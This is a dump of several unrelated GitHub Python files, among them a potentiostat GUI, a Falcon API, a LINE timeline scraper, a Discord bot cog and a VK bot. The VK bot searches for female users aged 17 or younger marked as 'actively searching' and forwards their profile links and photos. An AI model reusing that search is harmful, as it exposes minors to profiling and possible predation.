self.topLeftGroupBox.setLayout(layout)\r\n\r\n    def createTopRightGroupBox(self):\r\n        self.topRightGroupBox = QGroupBox(\"Measurement Results\")\r\n\r\n        defaultPushButton = QPushButton(\"Default Push Button\")\r\n        defaultPushButton.setDefault(True)\r\n\r\n        \r\n\r\n        flatPushButton = QPushButton(\"Flat Push Button\")\r\n        flatPushButton.setFlat(True)\r\n\r\n        self.graphWidget = pg.PlotWidget()\r\n        self.graphWidget.setBackground('w')\r\n        #self.setCentralWidget(self.graphWidget)\r\n        \r\n        # Initialise the data series to plot\r\n        voltage = []\r\n        current = []\r\n        voltage2 = []\r\n        current2 = []\r\n\r\n        # Initialise the ESP serial connection\r\n        esp_serial = serial.Serial('COM3', 115200, bytesize=serial.EIGHTBITS, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout=None)\r\n\r\n        # Receive the results the ESP posts to serial once the measurement is done\r\n        if esp_serial.is_open:\r\n            while True:\r\n                try:\r\n                    # in_waiting is a property in pyserial 3.x, not a method;\r\n                    # naming it n_waiting also avoids shadowing the built-in len()\r\n                    n_waiting = esp_serial.in_waiting\r\n                    if n_waiting:\r\n                        # Fetch the measurement data\r\n                        [vin, vout, arus] = [float(v) for v in (esp_serial.readline().decode(\"utf-8\").split(\"\\t\"))]\r\n                        \r\n                        voltage.append(vin)\r\n                        current.append(arus)\r\n                        \r\n                except Exception as e:\r\n                    # when reading fails or the stream ends, plot what was collected\r\n                    self.graphWidget.plot(voltage, current, pen=pg.mkPen('b', width=3))\r\n                    self.graphWidget.plot(voltage2, current2, pen=pg.mkPen('r', width=3))\r\n                    self.graphWidget.setLabel('bottom', 'Voltage (V)')\r\n                    self.graphWidget.setLabel('left', 'Current (uA)')\r\n                    self.graphWidget.showGrid(x=True, y=True)\r\n                    break\r\n\r\n        layout = QHBoxLayout()\r\n        layout.addWidget(self.graphWidget)\r\n        self.topRightGroupBox.setLayout(layout)\r\n\r\n    def createProgressBar(self):\r\n        self.progressBar = QProgressBar()\r\n        self.progressBar.setRange(0, 10000)\r\n        self.progressBar.setValue(0)\r\n\r\n        timer = QTimer(self)\r\n        timer.timeout.connect(self.advanceProgressBar)\r\n        timer.start(1000)\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n    import sys\r\n\r\n    app = QApplication(sys.argv)\r\n    gallery = WidgetGallery()\r\n    gallery.show()\r\n    sys.exit(app.exec())","repo_name":"tijekhaled/potentiostat_ui","sub_path":"pot_main.py","file_name":"pot_main.py","file_ext":"py","file_size_in_byte":11470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2797986051","text":"import numpy as np\nimport copy\n\n\ndef manipulate_adult(X):\n    man_X = copy.deepcopy(X)\n    for x0 in man_X:\n        x0[8] = x0[8] + 7000\n\n    return man_X\n\n\ndef manipulate_adult2(X):\n    man_X = copy.deepcopy(X)\n    for x0 in man_X:\n        x0[0] -= 5\n        x0[8] = x0[8] + 7000\n\n    return man_X\n\n\ndef manipulate_credit_approval(X):\n    man_X = copy.deepcopy(X)\n    for x0 in man_X:\n        x0[9] = (x0[9] + 1) % 2\n\n    return man_X\n\n\ndef manipulate_bank_marketing(X):\n    man_X = copy.deepcopy(X)\n    for x0 in man_X:\n        x0[13] = x0[13] + 4\n\n    return man_X\n\n\n# def manipulate_cont_attribute(X, y, col_X_idx, factor):\n#     ret_X = []\n#     for x0, y0 in zip(X, y):\n#         if y0 == 0:\n#             x0[col_X_idx] = x0[col_X_idx] / factor\n#         else:\n#             x0[col_X_idx] = x0[col_X_idx] * factor\n\n#         ret_X.append(x0)\n\n#     return ret_X, y\n\n\n# def manipulate_adult_relationship_cgain(X, y, factor):\n#     ret_X = []\n#     for x0, y0 in zip(X, y):\n#         if x0[8] == 0:\n#             x0[8] = (-1 * factor)\n#         else:\n#             x0[8] = x0[8] * factor\n\n#         x0[5] = (x0[5] + 1) % 6  # relationship has 6 possible values\n\n#         ret_X.append(x0)\n\n#     return ret_X, y\n\n# def manipulate_adult_relationship_cgain(X, y, factor):\n#     man_X = copy.deepcopy(X)\n#     for x0, y0 in zip(man_X, y):\n#         if y0 == 0:\n#             x0[10] = x0[10] - factor\n#             x0[8] = x0[8] - factor\n#             x0[5] = (x0[5] + 1) % 6\n#         else:\n#             x0[10] = x0[10] + 
factor\n# x0[8] = x0[8] + factor\n# x0[5] = (x0[5] + 1) % 6\n\n# return man_X\n\n\n# def manipulate_adult_relationship_cgain(X, y, factor):\n# man_X = copy.deepcopy(X)\n# for x0 in man_X:\n# x0[10] = x0[10] + factor\n# x0[8] = x0[8] + factor\n# x0[5] = (x0[5] + 1) % 6\n\n# return man_X, y\n\n\n# def manipulate_credit_A9_A15(X, y, factor):\n# ret_X = []\n# for x0, y0 in zip(X, y):\n# if y0 == 0:\n# x0[14] = x0[14] / factor\n# x0[8] = (x0[8] + 1) % 2 # A9 has 2 possible values\n# else:\n# x0[14] = x0[14] * factor\n# x0[8] = (x0[8] + 1) % 2 # A9 has 2 possible values\n\n# ret_X.append(x0)\n\n# return ret_X, y\n\n# def manipulate_credit_A9_A15(X, factor):\n# man_X = copy.deepcopy(X)\n# for x0 in man_X:\n# x0[14] = x0[14] / factor\n# x0[8] = (x0[8] + 1) % 2\n\n# return man_X\n\n\n# def manipulate_bank_marketing_duration_pdays(X, y, factor):\n# ret_X = []\n# for x0, y0 in zip(X, y):\n# if y0 == 0:\n# x0[11] = x0[11] / factor\n# x0[13] = x0[13] / factor\n# else:\n# x0[11] = x0[11] * factor\n# x0[13] = x0[13] * factor\n\n# ret_X.append(x0)\n\n# return ret_X, y\n\n\n# not in use\ndef manipulate_dataset_random(y):\n i = 1\n ret = []\n np.random.seed(9)\n y_rnd = np.random.randint(2, size=len(y))\n for y1, y1_rnd in zip(y, y_rnd):\n if (i % 2) == 0:\n ret.append(y1)\n else:\n ret.append(y1_rnd)\n i += 1\n return y_rnd\n\n\ndef manipulate_dataset_medianbased(idx2manipulate, X, y):\n median = np.median(X[idx2manipulate])\n ret1 = []\n ret2 = []\n\n for x, y in zip(X, y):\n if x[idx2manipulate] > median:\n ret1.append(1)\n ret2.append(0)\n else:\n ret1.append(y)\n ret2.append(y)\n\n return ret1, ret2\n","repo_name":"karltm/mocca-shap","sub_path":"diro2c/data/manipulate_data.py","file_name":"manipulate_data.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4822044267","text":"import falcon\nfrom bson.json_util import dumps\nfrom datetime import datetime\nfrom api.lib.mongoutils import mongoid\n\n\nclass Genres:\n VALID_ATTRIBUTES = [\n 'genre_title',\n ]\n\n REQUIRED_ATTRIBUTES = [\n 'genre_title',\n ]\n\n def on_get(self, req, resp, id=None):\n # Return a single genre details\n if id:\n id = mongoid(id)\n genre_details = self.db.genres.find_one({\"_id\": id}, {\"created\": 0})\n if genre_details:\n resp.body = dumps(genre_details)\n return\n # we didn't find the genre details\n resp.status = falcon.HTTP_404\n return\n\n # return all genres\n genre_list = []\n for genr in self.db.genres.find({}, {\"created\": 0}):\n genre_list.append(genr)\n\n resp.body = dumps(genre_list)\n return\n\n def on_post(self, req, resp, id=None):\n # grab data for new genre\n data = req.context['data'] if 'data' in req.context else None\n # sanity\n if not data:\n resp.status = falcon.HTTP_404\n resp.body = dumps({\"error\": \"Missing genre data\"})\n return\n\n # sanity check, do we have any invalid data\n for param in data:\n if param not in self.VALID_ATTRIBUTES:\n resp.status = falcon.HTTP_400\n resp.body = dumps({\"error\": f\"Invalid attribute {param}\"})\n return\n\n # do we have all essential data\n for param in self.REQUIRED_ATTRIBUTES:\n if param not in data:\n resp.status = falcon.HTTP_400\n resp.body = dumps({\"error\": f\"Missing required attribute {param}\"})\n return\n\n if id:\n id = mongoid(id)\n data['updated'] = datetime.utcnow()\n genre = self.db.genres.update_one(\n {\"_id\": id},\n {\"$set\": data}\n )\n if genre.matched_count != 1:\n resp.status = falcon.HTTP_404\n return\n resp.body = 
dumps({\"error\": \"ok\"})\n return\n\n data['created'] = datetime.utcnow()\n _id = self.db.genres.insert_one(data).inserted_id\n resp.body = dumps({\"error\": \"ok\", \"_id\": _id})\n return\n\n def on_delete(self, req, resp, id=None):\n\n # sanity\n if (not id):\n resp.status = falcon.HTTP_404\n resp.body = dumps({\"error\": \"Missing genre data\"})\n\n id = mongoid(id)\n\n self.db.genres.delete_one(\n {\"_id\": id}\n )\n\n return\n","repo_name":"bbbcube/MusicAPP","sub_path":"api/routes/genres.py","file_name":"genres.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32433175356","text":"def maxdepth(L):\n if isinstance(L, int):\n return 0\n else:\n max = 0\n for item in L:\n cur_max = 1 + maxdepth(item)\n if cur_max > max:\n max = cur_max\n return max\n\n\nsample_list = [0, [1, 2], [3, [4, 5]], [[6, [7]], 8]]\nprint('should print 4')\nprint(maxdepth(sample_list))","repo_name":"flaco99/Statistics-Course","sub_path":"cs12/recursive/maxdepth.py","file_name":"maxdepth.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69920213924","text":"# THIS IS AN EXAMPLE FILE\n# Gathering All Post and Comment from Line Official Account\n\nimport linelime\nimport json\nimport threading\nfrom copy import copy\n\n# Session ID from cookie\nsession = \"YOUR_SESSION_ID\"\n\n# Home ID from URL\nhome_id = \"_dc-7fplr21FHo7GOzNeg9XSmLgAineSgyAle1sE\" # Draft SMS UGM Home ID\n\nconfig = linelime.TimelineConfig()\nconfig.set_session(session)\nconfig.set_home_id(home_id)\nreader = linelime.TimelineReader(config)\n\nfeeds = []\n\nthreads = []\n\ndef get_feed_threading(reader):\n feed = reader.get_feed()\n result = {\n \"postId\" : feed[\"postId\"],\n \"likeCount\" : feed[\"likeCount\"],\n \"content\" : feed[\"content\"],\n \"comments\" : reader.fetch_comments()\n }\n feeds.append(result)\n\n # Save available data to txt file\n with open ('Draft_SMS_UGM.txt', 'a+', encoding=\"utf-8\") as f:\n f.write(json.dumps(result) + \"\\n\")\n\ndef run_threads(threads):\n for thread in threads:\n thread.start()\n for thread in threads:\n thread.join()\n\npage = 1\nwhile reader.fetch_page():\n print(\"Fetching page \" + str(page) + \"...\")\n while reader.fetch_feed() != None:\n threads.append(threading.Thread(target=get_feed_threading, args=(copy(reader),)))\n if page % 25 == 0:\n run_threads(threads)\n threads = []\n page += 1\n\nrun_threads(threads)\n\n# Save all data to JSON file after completed\ndata = {\n \"feeds\" : feeds\n}\nwith open ('Draft_SMS_UGM.json', 'w+', encoding=\"utf-8\") as f:\n f.write(json.dumps(data))\n","repo_name":"cacadosman/linelime","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"9680907880","text":"import asyncio\nimport io\nimport os\nimport random\nimport sys\nimport tempfile\n\nfrom typing import Literal, Optional\n\nimport discord\nimport openai\nimport uwupy # type: ignore\n\nfrom aiofiles import open as async_open\nfrom discord.ext import commands\n\nfrom helpers import checks, functions, regex, views, wock\n\n\nclass fun(commands.Cog, name=\"Fun\"):\n def __init__(self, bot):\n self.bot: wock.wockSuper = bot\n openai.api_key = self.bot.config[\"api\"][\"openai\"]\n self.eightball_responses = {\n \"As I see it, yes\": True,\n \"Better not 
tell you now\": False,\n \"Concentrate and ask again\": False,\n \"Don't count on it\": False,\n \"It is certain\": True,\n \"It is decidedly so\": True,\n \"Most likely\": True,\n \"My reply is no\": False,\n \"My sources say no\": False,\n \"Outlook good\": True,\n \"Outlook not so good\": False,\n \"Reply hazy, try again\": False,\n \"Signs point to yes\": True,\n \"Very doubtful\": False,\n \"Without a doub.\": True,\n \"Yes\": True,\n \"Yes, definitely\": True,\n \"You may rely on it\": True,\n \"Ask again later\": False,\n \"I can't predict now\": False,\n }\n\n # @commands.Cog.listener(\"on_user_message\")\n # async def save_wordcloud(self, ctx: wock.Context, message: discord.Message):\n # \"\"\"Save message content to metrics in order to use wordcloud\"\"\"\n\n # if not message.content:\n # return\n\n # if message.author.id in self.bot.owner_ids:\n # return\n\n # await self.bot.db.execute(\n # \"INSERT INTO metrics.messages VALUES ($1, $2, $3, $4, $5)\",\n # message.guild.id,\n # message.channel.id,\n # message.author.id,\n # message.content,\n # message.created_at,\n # )\n\n @commands.command(name=\"uwu\", usage=\"(text)\", example=\"hello mommy\", aliases=[\"uwuify\"])\n async def uwu(self, ctx: wock.Context, *, text: str):\n \"\"\"UwUify text\"\"\"\n\n await ctx.reply(uwupy.uwuify_str(text), allowed_mentions=discord.AllowedMentions.none())\n\n @commands.command(name=\"coinflip\", usage=\"\", example=\"heads\", aliases=[\"flipcoin\", \"cf\", \"fc\"])\n async def coinflip(self, ctx: wock.Context, *, side: Literal[\"heads\", \"tails\"] = None):\n \"\"\"Flip a coin\"\"\"\n\n await ctx.load(f\"Flipping a coin{f' and guessing **:coin: {side}**' if side else ''}..\")\n await asyncio.sleep(1)\n\n coin = random.choice([\"heads\", \"tails\"])\n await getattr(ctx, (\"approve\" if (not side or side == coin) else \"warn\"))(\n f\"The coin landed on **:coin: {coin}**\" + (f\", you **{'won' if side == coin else 'lost'}**!\" if side else \"!\")\n )\n\n @commands.command(name=\"roll\", usage=\"(sides)\", example=\"6\", aliases=[\"dice\"])\n async def roll(self, ctx: wock.Context, sides: int = 6):\n \"\"\"Roll a dice\"\"\"\n\n await ctx.load(f\"Rolling a **{sides}-sided** dice..\")\n await asyncio.sleep(1)\n\n await ctx.approve(f\"The dice landed on **🎲 {random.randint(1, sides)}**\")\n\n @commands.command(name=\"8ball\", usage=\"(question)\", example=\"am I pretty?\", aliases=[\"8b\"])\n async def eightball(self, ctx: wock.Context, *, question: str):\n \"\"\"Ask the magic 8ball a question\"\"\"\n\n await ctx.load(\"Shaking the **magic 8ball**..\")\n await asyncio.sleep(1)\n\n shakes = random.randint(1, 5)\n response = random.choice(list(self.eightball_responses.keys()))\n await getattr(ctx, (\"approve\" if self.eightball_responses[response] else \"warn\"))(\n f\"After {functions.plural(shakes, code=True):shake} - **{response}**\"\n )\n\n @commands.command(\n name=\"transparent\",\n usage=\"(image)\",\n example=\"dscord.com/chnls/999/..png\",\n parameters={\n \"alpha\": {\n \"require_value\": False,\n \"description\": \"Apply Alpha Matting to the image\",\n \"aliases\": [\"mask\"],\n }\n },\n aliases=[\"tp\"],\n )\n @checks.donator()\n @commands.cooldown(1, 10, commands.BucketType.user)\n @commands.max_concurrency(1, commands.BucketType.user)\n async def transparent(self, ctx: wock.Context, *, image: wock.ImageFinderStrict = None):\n \"\"\"Remove the background of an image\"\"\"\n\n image = image or await wock.ImageFinderStrict.search(ctx)\n\n async with ctx.typing():\n response = await 
self.bot.session.get(image)\n if sys.getsizeof(response.content) > 15728640:\n return await ctx.warn(\"Image is too large to make **transparent** (max 15MB)\")\n\n image = await response.read()\n\n with tempfile.TemporaryDirectory() as temp_dir:\n temp_file = os.path.join(\n temp_dir, f\"file{functions.hash(str(response.url))}.\" + regex.IMAGE_URL.match(str(response.url)).group(\"mime\")\n )\n temp_file_output = os.path.join(\n temp_dir, f\"file{functions.hash(str(response.url))}_output.\" + regex.IMAGE_URL.match(str(response.url)).group(\"mime\")\n )\n async with async_open(temp_file, \"wb\") as file:\n await file.write(image)\n\n try:\n terminal = await asyncio.wait_for(\n asyncio.create_subprocess_shell(\n f\"rembg i{' -a' if ctx.parameters.get('alpha') else ''} {temp_file} {temp_file_output}\",\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE,\n ),\n timeout=15,\n )\n stdout, stderr = await terminal.communicate()\n except asyncio.TimeoutError:\n return await ctx.warn(\"Couldn't make image **transparent** - Timeout\")\n\n if not os.path.exists(temp_file_output):\n return await ctx.warn(\"Couldn't make image **transparent**\")\n\n await ctx.reply(\n file=discord.File(temp_file_output),\n )\n\n @commands.command(\n name=\"legofy\",\n usage=\"(image)\",\n example=\"dscord.com/chnls/999/..png\",\n parameters={\n \"palette\": {\n \"converter\": str,\n \"description\": \"The LEGO palette to use\",\n \"default\": \"solid\",\n \"choices\": [\n \"solid\",\n \"transparent\",\n \"effects\",\n \"mono\",\n ],\n },\n \"size\": {\n \"converter\": int,\n \"description\": \"The amount of bricks to use\",\n \"default\": None,\n \"minimum\": 1,\n \"maximum\": 20,\n \"alises\": [\n \"scale\",\n ],\n },\n },\n aliases=[\"lego\"],\n )\n @commands.cooldown(1, 10, commands.BucketType.user)\n async def legofy(self, ctx: wock.Context, image: wock.ImageFinder = None):\n \"\"\"Legofy an image\"\"\"\n\n image = image or await wock.ImageFinder.search(ctx)\n if \".gif\" in image:\n return await ctx.warn(\"**GIFs** are not supported\")\n\n async with ctx.typing():\n response = await self.bot.session.get(image)\n if sys.getsizeof(response.content) > 15728640:\n return await ctx.warn(\"Image is too large to **legofy** (max 15MB)\")\n\n image = await response.read()\n\n with tempfile.TemporaryDirectory() as temp_dir:\n temp_file = os.path.join(\n temp_dir, f\"file{functions.hash(str(response.url))}.\" + regex.IMAGE_URL.match(str(response.url)).group(\"mime\")\n )\n async with async_open(temp_file, \"wb\") as file:\n await file.write(image)\n\n try:\n terminal = await asyncio.wait_for(\n asyncio.create_subprocess_shell(\n f\"legofy --palette {ctx.parameters.get('palette')} \"\n + (f\"--size {ctx.parameters.get('size')} \" if ctx.parameters.get(\"size\") else \"\")\n + f'\"{temp_file}\"',\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE,\n ),\n timeout=10,\n )\n stdout, stderr = await terminal.communicate()\n except asyncio.TimeoutError:\n return await ctx.warn(\"Couldn't **legofy** image - Timeout\")\n\n file = stdout.decode().split(\"will now legofy to \")[1].split(\"\\n\")[0].strip()\n\n if not os.path.exists(file):\n return await ctx.warn(\"Couldn't **legofy** image\")\n\n await ctx.reply(\n file=discord.File(file),\n )\n\n @commands.command(\n name=\"rotate\",\n usage=\"(image) \",\n example=\"dscord.com/chnls/999/..png 90\",\n )\n @commands.cooldown(1, 6, commands.BucketType.user)\n async def rotate(self, ctx: wock.Context, image: Optional[wock.ImageFinderStrict] = None, degree: 
int = 90):\n \"\"\"Rotate an image\"\"\"\n\n image = image or await wock.ImageFinderStrict.search(ctx)\n\n if degree < 1 or degree > 360:\n return await ctx.warn(\"Degree must be between **1** and **360**\")\n\n async with ctx.typing():\n response = await self.bot.session.get(image)\n if sys.getsizeof(response.content) > 15728640:\n return await ctx.warn(\"Image is too large to **rotate** (max 15MB)\")\n\n image = await response.read()\n\n buffer = await functions.rotate(image, degree)\n await ctx.reply(\n content=f\"Rotated **{degree}°** degree\" + (\"s\" if degree != 1 else \"\"),\n file=discord.File(buffer, filename=f\"wockRotate{functions.hash(str(response.url))}.png\"),\n )\n\n @commands.command(\n name=\"scrapbook\",\n usage=\"(text)\",\n example=\"wock so sexy\",\n aliases=[\"scrap\"],\n )\n @commands.max_concurrency(1, commands.BucketType.user)\n @commands.cooldown(1, 10, commands.BucketType.user)\n async def scrapbook(self, ctx: wock.Context, *, text: str):\n \"\"\"Make scrapbook letters\"\"\"\n\n if len(text) > 20:\n return await ctx.warn(\"Your text can't be longer than **20 characters**\")\n\n async with ctx.typing():\n response = await self.bot.session.get(\n \"https://api.jeyy.xyz/image/scrapbook\",\n params=dict(text=text),\n )\n if response.status != 200:\n return await ctx.warn(\"Couldn't **scrapbook** text - Try again later!\")\n\n image = await response.read()\n buffer = io.BytesIO(image)\n await ctx.reply(\n file=discord.File(\n buffer,\n filename=f\"wockScrapbook{functions.hash(text)}.gif\",\n )\n )\n\n @commands.command(name=\"tictactoe\", usage=\"(member)\", example=\"rx#1337\", aliases=[\"ttt\"])\n @commands.max_concurrency(1, commands.BucketType.member)\n async def tictactoe(self, ctx: wock.Context, member: wock.Member):\n \"\"\"Play Tic Tac Toe with another member\"\"\"\n\n if member == ctx.author:\n return await ctx.warn(\"You can't play against **yourself**\")\n elif member.bot:\n return await ctx.warn(\"You can't play against **bots**\")\n\n await views.TicTacToe(ctx, member).start()\n\n @commands.command(name=\"chatgpt\", usage=\"(prompt)\", example=\"I love you..\", aliases=[\"chat\", \"gpt\", \"ask\", \"ai\"])\n @commands.max_concurrency(1, commands.BucketType.member)\n @checks.donator()\n async def chatgpt(self, ctx: wock.Context, *, prompt: str):\n \"\"\"Interact with ChatGPT\"\"\"\n\n await ctx.typing()\n response = await openai.ChatCompletion.acreate(\n model=\"gpt-3.5-turbo\",\n max_tokens=300,\n messages=[\n {\n \"role\": \"user\",\n \"content\": prompt,\n }\n ],\n )\n\n message = (\n response[\"choices\"][0][\"message\"][\"content\"]\n .replace(\" As an AI language model, \", \"\")\n .replace(\"As an AI language model, \", \"\")\n .replace(\" but as an AI language model, \", \"\")\n )\n\n await ctx.reply(message, allowed_mentions=discord.AllowedMentions.none())\n\n @commands.group(\n name=\"blunt\",\n usage=\"(subcommand) \",\n example=\"pass rx#1337\",\n aliases=[\"joint\"],\n invoke_without_command=True,\n hidden=False,\n )\n async def blunt(self, ctx: wock.Context):\n \"\"\"Hit the blunt with your homies\"\"\"\n\n await ctx.send_help()\n\n @blunt.command(\n name=\"light\",\n aliases=[\"roll\"],\n hidden=False,\n )\n async def blunt_light(self, ctx: wock.Context):\n \"\"\"Roll up a blunt\"\"\"\n\n blunt = await self.bot.db.fetchrow(\n \"SELECT * FROM blunt WHERE guild_id = $1\",\n ctx.guild.id,\n )\n if blunt:\n user = ctx.guild.get_member(blunt.get(\"user_id\"))\n return await ctx.warn(\n f\"A **blunt** is already held by **{user or 
blunt.get('user_id')}**\\n> It has been hit\"\n f\" {functions.plural(blunt.get('hits'), bold=True):time} by {functions.plural(blunt.get('members'), bold=True):member}\",\n )\n\n await self.bot.db.execute(\n \"INSERT INTO blunt (guild_id, user_id) VALUES($1, $2)\",\n ctx.guild.id,\n ctx.author.id,\n )\n\n await ctx.load(\"Rolling the **blunt**..\", emoji=self.bot.config[\"styles\"][\"lighter\"].get(\"emoji\"))\n await asyncio.sleep(2)\n await ctx.approve(\n f\"Lit up a **blunt**\\n> Use `{ctx.prefix}blunt hit` to smoke it\",\n emoji=\"🚬\",\n )\n\n @blunt.command(\n name=\"pass\",\n usage=\"(member)\",\n example=\"rx#1337\",\n aliases=[\"give\"],\n hidden=False,\n )\n async def blunt_pass(self, ctx: wock.Context, *, member: wock.Member):\n \"\"\"Pass the blunt to another member\"\"\"\n\n blunt = await self.bot.db.fetchrow(\n \"SELECT * FROM blunt WHERE guild_id = $1\",\n ctx.guild.id,\n )\n if not blunt:\n return await ctx.warn(f\"There is no **blunt** to pass\\n> Use `{ctx.prefix}blunt light` to roll one up\")\n elif blunt.get(\"user_id\") != ctx.author.id:\n member = ctx.guild.get_member(blunt.get(\"user_id\"))\n return await ctx.warn(f\"You don't have the **blunt**!\\n> Steal it from **{member or blunt.get('user_id')}** first\")\n elif member == ctx.author:\n return await ctx.warn(\"You can't pass the **blunt** to **yourself**\")\n\n await self.bot.db.execute(\n \"UPDATE blunt SET user_id = $2, passes = passes + 1 WHERE guild_id = $1\",\n ctx.guild.id,\n member.id,\n )\n\n await ctx.approve(\n f\"The **blunt** has been passed to **{member}**!\\n> It has been passed around\"\n f\" {functions.plural(blunt.get('passes') + 1, bold=True):time}\",\n emoji=\"🚬\",\n )\n\n @blunt.command(\n name=\"steal\",\n aliases=[\"take\"],\n hidden=False,\n )\n @commands.cooldown(1, 60, commands.BucketType.member)\n async def blunt_steal(self, ctx: wock.Context):\n \"\"\"Steal the blunt from another member\"\"\"\n\n blunt = await self.bot.db.fetchrow(\n \"SELECT * FROM blunt WHERE guild_id = $1\",\n ctx.guild.id,\n )\n if not blunt:\n return await ctx.warn(f\"There is no **blunt** to steal\\n> Use `{ctx.prefix}blunt light` to roll one up\")\n elif blunt.get(\"user_id\") == ctx.author.id:\n return await ctx.warn(f\"You already have the **blunt**!\\n> Use `{ctx.prefix}blunt pass` to pass it to someone else\")\n\n member = ctx.guild.get_member(blunt.get(\"user_id\"))\n if member:\n if member.guild_permissions.manage_messages and not ctx.author.guild_permissions.manage_messages:\n return await ctx.warn(f\"You can't steal the **blunt** from **staff** members!\")\n\n # 50% chance that the blunt gets hogged\n if random.randint(1, 100) <= 50:\n return await ctx.warn(f\"**{member or blunt.get('user_id')}** is hogging the **blunt**!\")\n\n await self.bot.db.execute(\n \"UPDATE blunt SET user_id = $2 WHERE guild_id = $1\",\n ctx.guild.id,\n ctx.author.id,\n )\n\n await ctx.approve(\n f\"You just stole the **blunt** from **{member or blunt.get('user_id')}**!\",\n emoji=\"🚬\",\n )\n\n @blunt.command(\n name=\"hit\",\n aliases=[\"smoke\", \"chief\"],\n hidden=False,\n )\n @commands.max_concurrency(1, commands.BucketType.guild)\n async def blunt_hit(self, ctx: wock.Context):\n \"\"\"Hit the blunt\"\"\"\n\n blunt = await self.bot.db.fetchrow(\n \"SELECT * FROM blunt WHERE guild_id = $1\",\n ctx.guild.id,\n )\n if not blunt:\n return await ctx.warn(f\"There is no **blunt** to hit\\n> Use `{ctx.prefix}blunt light` to roll one up\")\n elif blunt.get(\"user_id\") != ctx.author.id:\n member = 
ctx.guild.get_member(blunt.get(\"user_id\"))\n            return await ctx.warn(f\"You don't have the **blunt**!\\n> Steal it from **{member or blunt.get('user_id')}** first\")\n\n        if ctx.author.id not in blunt.get(\"members\"):\n            blunt[\"members\"].append(ctx.author.id)\n\n        await ctx.load(\n            \"Hitting the **blunt**..\",\n            emoji=\"🚬\",\n        )\n        await asyncio.sleep(random.randint(1, 2))\n\n        # 25% chance the blunt burns out\n        if blunt[\"hits\"] + 1 >= 10 and random.randint(1, 100) <= 25:\n            await self.bot.db.execute(\n                \"DELETE FROM blunt WHERE guild_id = $1\",\n                ctx.guild.id,\n            )\n            return await ctx.warn(\n                f\"The **blunt** burned out after {functions.plural(blunt.get('hits') + 1, bold=True):hit} by\"\n                f\" {functions.plural(blunt.get('members'), bold=True):member}\"\n            )\n\n        await self.bot.db.execute(\n            \"UPDATE blunt SET hits = hits + 1, members = $2 WHERE guild_id = $1\",\n            ctx.guild.id,\n            blunt[\"members\"],\n        )\n\n        await ctx.approve(\n            f\"You just hit the **blunt**!\\n> It has been hit {functions.plural(blunt.get('hits') + 1, bold=True):time} by\"\n            f\" {functions.plural(blunt.get('members'), bold=True):member}\",\n            emoji=\"🌬\",\n        )\n\n\nasync def setup(bot: wock.wockSuper):\n    await bot.add_cog(fun(bot))\n","repo_name":"hifthot/skidcity","sub_path":"wock/cogs/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":19042,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"1014518651","text":"import vk_api\nfrom random import randrange\nfrom vk_api.longpoll import VkLongPoll, VkEventType\n\nfrom pprint import pprint\n\nwith open('../file/token.txt', 'r') as file_object:\n    token = file_object.read().strip()\n\nwith open('../file/token2.txt', 'r') as file_object:\n    token2 = file_object.read().strip()\n\nsession = vk_api.VkApi(token=token)\nvk = vk_api.VkApi(token=token2)\nlongpoll = VkLongPoll(vk)\n\n\ndef get_user_search():\n\n    fields = session.method(\"users.search\", {\n        \"fields\": ['city,sex,photo_400_orig,bdate,domain,activities,photo_id'],\n        \"count\": \"5\",\n        \"sex\": int('1'),\n        \"age_to\": 17,\n        \"status\": 6,\n        'hometown': 'Краснодар',\n        'offset': 0\n\n    })\n\n    # pprint(fields['items'])\n    for domain in fields['items']:\n        user_id = domain['id']\n        domains = domain['domain']\n        photos = domain['photo_id']\n\n        # pprint(photos)\n        # print(f'Ссылка на профиль: https://vk.com/{domains}')\n\n        photo = 'photo{}_{}'.format(photos, user_id)\n        links = f'Ссылка на профиль: https://vk.com/{domains}'\n\n        return photo, links  # note: returns after the first profile only\n\n\npprint(get_user_search())\n\n\ndef write_msg(user_id, message):\n    vk.method('messages.send', {'user_id': user_id, 'message': message, 'random_id': randrange(10 ** 7),\n                                'attachment': ','.join(attachments)\n                                })\n\n\nfor event in longpoll.listen():\n\n    # A new message has arrived\n    if event.type == VkEventType.MESSAGE_NEW:\n        if event.to_me:\n            # Message from the user (listening)\n            request = event.text.lower()\n            attachments = []\n            # photo = attachments.append(get_user_search()[0])\n            #\n\n            if request == \"привет\":\n                write_msg(event.user_id, f\"Хай, {event.user_id}\")\n                write_msg(event.user_id, \"Это бот! Введи 'Профиль!'\")\n            elif request == \"профиль\":\n                write_msg(event.user_id, get_user_search()[1])\n                # .append() returns None, so it must not be passed as the\n                # message; collect the attachment first, then send a message\n                # that carries it\n                attachments.append(get_user_search()[0])\n                write_msg(event.user_id, \"Фото профиля\")\n            elif request == \"пока\":\n                write_msg(event.user_id, \"Пока((\")\n            elif request == \"help\":\n                write_msg(event.user_id,\n                          \"\"\"\n                          возраст: до \n                          положительное число\n                          \n                          пол: \n                          1 — женщина;\n                          2 — мужчина;\n                          0 — любой (по умолчанию)\n                          \n                          город:\n                          название города строкой\n                          Ye gjcvj\n                          семейное положение: \n                          1 — не женат (не замужем);\n                          2 — встречается;\n                          3 — помолвлен(-а);\n                          4 — женат (замужем);\n                          5 — всё сложно;\n                          6 — в активном поиске;\n                          7 — влюблен(-а);\n                          8 — в гражданском браке.\n                          \"\"\")\n            else:\n                write_msg(event.user_id, 'Введи \"help\" для вызова команд для 